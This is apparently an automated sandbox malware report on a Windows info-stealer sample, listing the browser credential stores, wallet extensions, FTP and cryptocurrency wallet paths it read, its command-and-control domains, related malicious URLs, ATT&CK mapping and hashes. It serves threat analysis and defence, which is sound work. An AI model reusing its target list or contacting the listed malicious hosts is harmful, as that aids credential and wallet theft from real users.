Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY

          Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 6764, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; the bracketed number is the report's count of matched signatures for that technique, techniques without a number are unmatched matrix entries)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation [2]; Command and Scripting Interpreter [2]; PowerShell [1]; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion [34]; Process Injection [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [2]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [751]; Virtualization/Sandbox Evasion [34]; Process Discovery [2]; File and Directory Discovery [1]; System Information Discovery [223]; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data [1]; Data from Local System [41]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus detections (Source | Detection | Scanner | Label)
file.exe | 39% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
URL reputation (Source | Detection | Scanner | Label)
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
necklacedmny.store | 188.114.96.3 | true | true | | unknown
presticitpo.store | unknown | unknown | true | | unknown
thumbystriw.store | unknown | unknown | true | | unknown
crisiwarny.store | unknown | unknown | true | | unknown
fadehairucw.store | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://necklacedmny.store/api | true | | unknown
presticitpo.store | true | | unknown
scriptyprefej.store | true | | unknown
necklacedmny.store | true | | unknown
fadehairucw.store | true | | unknown
navygenerayk.store | true | | unknown
founpiuer.store | true | | unknown
thumbystriw.store | true | | unknown
crisiwarny.store | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.amazon.c | file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/apiC | file.exe, 00000000.00000002.2173989776.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172326210.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172028798.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/api? | file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/# | file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/c | file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/ | file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | file.exe, 00000000.00000003.2109354346.00000000058FD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | file.exe, 00000000.00000003.2110851091.000000000108D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store/api5 | file.exe, 00000000.00000003.2169316679.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176031548.0000000005801000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/products/firefoxgro.all | file.exe, 00000000.00000003.2110462706.0000000005B12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.2081897605.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081782731.0000000005829000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081712312.000000000582C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://necklacedmny.store:443/api | file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store/K | file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140500751.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125885120.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126281997.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144388189.0000000001084000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124441129.0000000001077000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151772082.0000000001084000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://necklacedmny.store | file.exe, 00000000.00000002.2176009298.00000000057F2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172310521.00000000057F1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.96.3 | necklacedmny.store | European Union | | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1546005
Start date and time: 2024-10-31 11:26:57 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@5/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 6764 because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
Time | Type | Description
06:27:49 | API Interceptor | 9x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: 188.114.96.3
VfKk5EmvwW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 083098cm.n9shteam.in/vmBase.php
Payment Slip_SJJ023639#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse
• filetransfer.io/data-package/CEqTVkxM/download
0JLWNg4Sz1.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 977255cm.nyashkoon.in/secureWindows.php
zxalphamn.doc | Get hash | malicious | Lokibot | Browse
• touxzw.ir/alpha2/five/fre.php
QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse
• filetransfer.io/data-package/jI82Ms6K/download
9D7RwuJrth.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
DBUfLVzZhf.exe | Get hash | malicious | JohnWalkerTexasLoader | Browse
• xilloolli.com/api.php?status=1&wallets=0&av=1
R5AREmpD4S.exe | Get hash | malicious | JohnWalkerTexasLoader | Browse
• xilloolli.com/api.php?status=1&wallets=0&av=1
7950COPY.exe | Get hash | malicious | FormBook | Browse
• www.globaltrend.xyz/b2h2/
transferencia interbancaria_667553466579.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
• paste.ee/d/Gitmx
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: necklacedmny.store
file.exe | Get hash | malicious | LummaC | Browse
• 188.114.97.3
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm | Browse
• 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 188.114.97.3
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 188.114.97.3
file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer | Browse
• 188.114.96.3
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 188.114.97.3
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake Stealer | Browse
• 188.114.97.3
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | Browse
• 188.114.97.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: CLOUDFLARENETUS
https://flaviarc.com/vrecord%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/ | Get hash | malicious | HTMLPhisher | Browse
• 104.18.3.157
Eprdtdrqbr.exe | Get hash | malicious | Snake Keylogger | Browse
• 188.114.96.3
N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exe | Get hash | malicious | Snake Keylogger | Browse
• 188.114.96.3
HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe | Get hash | malicious | FormBook | Browse
• 172.67.177.220
Proforma Invoice.scr.exe | Get hash | malicious | AgentTesla | Browse
• 104.26.13.205
24602711 Inv_Or.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse
• 188.114.96.3
http://www.thearchiterra.gr/ | Get hash | malicious | Unknown | Browse
• 104.17.25.14
MP2318GJ-P 18000pcs.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
• 188.114.97.3
hesaphareketi-01.exe | Get hash | malicious | MassLogger RAT | Browse
• 188.114.96.3
file.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse
• 104.26.12.205
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: a0e9f5d64349fb13191bc781f81f42e1
Orden de compra.xla.xlsx | Get hash | malicious | Unknown | Browse
• 188.114.96.3
Orden de compra.xla.xlsx | Get hash | malicious | Unknown | Browse
• 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm | Browse
• 188.114.96.3
Swift payment confirmation.exe | Get hash | malicious | DBatLoader, FormBook | Browse
• 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 188.114.96.3
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 188.114.96.3
file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer | Browse
• 188.114.96.3
                                                                No context
                                                                No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.511131848851435
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 3'038'208 bytes
MD5: d6d4c4264450023d69bda4d017fe3771
SHA1: ce52488d60a985b5a6f66d87fd651a24945bba72
SHA256: 3da9dc898a09a8c3f35ddcda206e53a2da0be374de54145f3acf6c0d146a72c8
SHA512: 4f8579f85581d6e03b5281e7d871cd48484f08232d34361bd7ffa5fc710f201cc3739f50e7666aee702a4c1c7bb928ae35fd4b31effd93972438ffded707ce9d
SSDEEP: 49152:18PziDvuWmtz6leocvB66CETDsfNtZRtpEiwTYmWeY74R:6iDvuWmtz6G6bTzeY74
TLSH: 3DE549A2B50973CFD4CE17749967CEA6DD5C02F90B1088C39C2E647A7E67CC519BAC28
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........p1...........@...........................1...........@.................................T...h..
Icon Hash: 00928e8e8686b000
